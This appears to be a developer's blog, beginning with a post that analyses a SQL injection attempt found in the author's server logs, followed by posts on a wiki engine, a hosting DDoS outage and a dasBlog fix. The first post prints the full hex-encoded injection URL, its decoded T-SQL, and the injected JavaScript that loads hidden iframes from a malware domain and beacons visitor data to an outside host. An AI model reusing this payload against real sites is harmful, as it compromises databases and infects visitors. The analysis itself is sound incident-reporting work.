I was reviewing the logs from my site today and noticed this error message:

Error:
System.FormatException: Input string was not in a correct format.
at System.Number.StringToNumber(String str, NumberStyles options, 
NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal)
...
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, 
Boolean includeStagesAfterAsyncPoint)
while processing http://www.stevetrefethen.com/blog/monthview.aspx?year=2004;DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303
029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E61
6D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726
520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220
494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632
827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C7363
72697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223
E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B
6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756
E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
55F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);.

As you can see there has been a bunch of "stuff" tacked onto the end of a URL starting with a few SQL statements. The rest is hex encoded text that when decoded reads as follows (FAIR WARNING: DO NOT ATTEMPT TO BROWSE TO THESE URLS UNLESS YOU KNOW WHAT YOU’RE DOING, YOU’VE BEEN WARNED):

 1 DECLARE @T varchar(255),@C varchar(4000) 
 2 DECLARE Table_Cursor CURSOR FOR 
 3 select a.name,b.name from sysobjects a,syscolumns b 
 4 where a.id=b.id and a.xtype='u' and 
 5 (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
 6 OPEN Table_Cursor 
 7 FETCH NEXT FROM  Table_Cursor 
 8 INTO @T,@C 
 9 WHILE(@@FETCH_STATUS=0) 
10 BEGIN 
11 exec('update ['+@T+'] set ['+@C+']=''"></title><script 
12 src="http://www0.douhunqn.cn/csrss/w.js">
13 </script><!--''+['+@C+'] where '+@C+' not like ''%">
14 </title>
15 <script src="http://www0.douhunqn.cn/csrss/w.js">
16 </script><!--''')
17 FETCH NEXT FROM  Table_Cursor 
18 INTO @T,@C 
19 END 
20 CLOSE Table_Cursor 
21 DEALLOCATE Table_Cursor

Which is attempting to inject the following JavaScript onto pages on the site:

 1 Close Window
 2 
 3 window.onerror = function() {
 4    document.write("<iframe width=0 height=0 
 5 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>"); 
 6    return true; 
 7    }
 8 if(typeof(js2eus) == "undefined") {
 9    var js2eus = 1; 
10    var yesdata; 
11    yesdata = '&refe=' + escape(document.referrer) + '&location=' + 
12 escape(document.location) + '&color=' + screen.colorDepth + 'x&
13 resolution=' + screen.width + 'x' + screen.height + '&
14 returning=' + cc_k() + '&language=' + navigator.systemLanguage + '&
15 ua=' + escape(navigator.userAgent); 
16    document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 
17 VSPACE=0 FRAMEBORDER=0 SCROLLING=no 
18 src=http://count41.51yes.com/sa.aspx?id=419214144' + 
19 yesdata + ' height=0 width=0></iframe>'); 
20    document.write("<iframe width=0 height=0 
21 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>"); 
22    }
23 function y_gVal(iz) {
24    var endstr = document.cookie.indexOf(";", iz); 
25    if(endstr ==- 1) endstr = document.cookie.length; 
26    return document.cookie.substring(iz, endstr); 
27    }
28 function y_g(name) {
29    var arg = name + "="; 
30    var alen = arg.length; 
31    var clen = document.cookie.length; 
32    var i = 0; 
33    var j; 
34    while(i < clen) {
35       j = i + alen; 
36       if(document.cookie.substring(i, j) == arg) return y_gVal(j); 
37       i = document.cookie.indexOf(" ", i) + 1; 
38       if(i == 0) break; 
39       }
40    return null; 
41    }
42 function cc_k() {
43    var y_e = new Date(); 
44    var y_t = 93312000; 
45    var yesvisitor = 1000 * 36000; 
46    var yesctime = y_e.getTime(); 
47    y_e.setTime(y_e.getTime() + y_t); 
48    var yesiz = document.cookie.indexOf("cck_lasttime"); 
49    if(yesiz ==- 1) {
50       document.cookie = "cck_lasttime=" + yesctime + "; expires=" + 
51 y_e.toGMTString() + "; path=/"; 
52       document.cookie = "cck_count=0; expires=" + y_e.toGMTString() + "; 
53 path=/"; 
54       return 0; 
55       }
56    else {
57       var y_c1 = y_g("cck_lasttime"); 
58       var y_c2 = y_g("cck_count"); 
59       y_c1 = parseInt(y_c1); 
60       y_c2 = parseInt(y_c2); 
61       y_c3 = yesctime - y_c1; 
62       if(y_c3 > yesvisitor) {
63          y_c2 = y_c2 + 1; 
64          document.cookie = "cck_lasttime=" + yesctime + "; expires=" + 
65 y_e.toGMTString() + "; path=/"; 
66          document.cookie = "cck_count=" + y_c2 + "; expires=" + 
67 y_e.toGMTString() + "; path=/"; 
68          }
69       return y_c2; 
70       }
71    }
72 
73 Close Window

Which lead to an IFRAME getting inserted into the page that executed more Javascript that attempts to exploit the following ActiveX controls:

• GLIEDown.IEDown.1
• IERPCtl.IERPCtl.1
• MPS.StormPlayer

Fortunately, nothing on my site runs using MSSQL including my blog so this isn’t particularly troubling for me. It sort of looks like it could be related to this sort of attack as the domains have the .cn suffix for China and the description sounds quite similar.

Other than perusing my logs occasionally I don’t have anything that scans my logs looking for potential exploits. Do you use anything? If so, what approach do you use?

If you haven’t taken a look at ScrewTurn wiki you should. In two words, it rocks!

Why?

• It’s free (licensed under GPL)
• It’s super easy to setup and has a variety of setup options
• Is actively developed
• Has a thriving online forum
• Is easy to administer
• Has a plugin architecture
• Doesn’t require a SQL server (defaults to file based storage)
• Is easy to theme
• Supports commercial licensing
• Easy to upgrade
• Is hosted by my ISP of choice discountASP.net
• Supports an easy to learn wiki syntax
• And more...

I think this wiki engine can easily serve as a starting point for a flexible small business web site.

I’m personally using this wiki engine on my own web site not to mention Falafel Software is using it as an internal company wiki. I’ve also installed it at a client location and it’s been well received and used daily.

If your company needs help getting this wiki or an entire web site setup feel free to contact me.

The last two days has meant a lot of down time for my domain as a result of a DDOS attack against my hosting provider DiscountASP.NET. In the response below is a link to an explanation of what happened as well as some graphs of the traffic spike.

Dear Customer,

We experienced a network-wide outage Thursday morning and late evening 
as the result of a distributed denial of service attack. You can read 
details related to the outage here: 
http://community.discountasp.net/default.aspx?f=6&m=18216&p=1

We would like to take this opportunity to make you aware of the 
DiscountASP.NET status page, located at http://daspstatus.com.

In the event of any future network-wide outage, the status page will be 
updated to provide you with as much information as possible. We hope 
such a page will allow us to communicate more effectively during an 
emergency situation, or when normal support office channels are affected by 
an outage. 

Our goal is to provide the highest quality, uninterrupted service 
available anywhere. We hope that we rarely have to utilize the status page, 
but we also want to be prepared to communicate during any possible 
emergency situations.

Thank you for your continued support,

DiscountASP.NET

I just learned via email from my provider, discountasp.net that they've suffered a major DOS attack accounting for the reason I couldn't reach my domain nor log into my hosting account. It appears as though they've at mitigated the attack as I'm able to post and login once again.

I've mentioned it before but I really like discountasp.net. Their service is very good and I got a reply from support via email after I inquired within a very reasonable period of time considering the cirrcumstances regarding the situation.

I've been running dasBlog for several months now and I'd been having problems with my login timing out very quickly. I added a HealthMonitoring section to my web.config so as to get email notifications when errors occurred. Right away I noticed that simply refreshing the browser could trigger an authentication error like:

Forms authentication failed for the request. Reason: The ticket 
supplied was invalid.

I Googled for ways to resolve these errors and found this article from my hosting provider no less. I then used the online machinekey generator and added it to my web.config and my dasblog login errors were history as well as the invalid viewstate problems! Basically, the key used for encrypting the authentication information was getting changed between request as a result of either the server or the ASP.NET worker process being recylced.

<providerplug>
You can probably tell I really like DiscountASP.NET they've got a great options, a great control panel (which is frequently enhanced) and they have some great technical staff who post to their support forums. I've gone so far as to join their referral program, so if you sign up please use the link above which includes my referral ID to let them know I sent you!
</providerplug>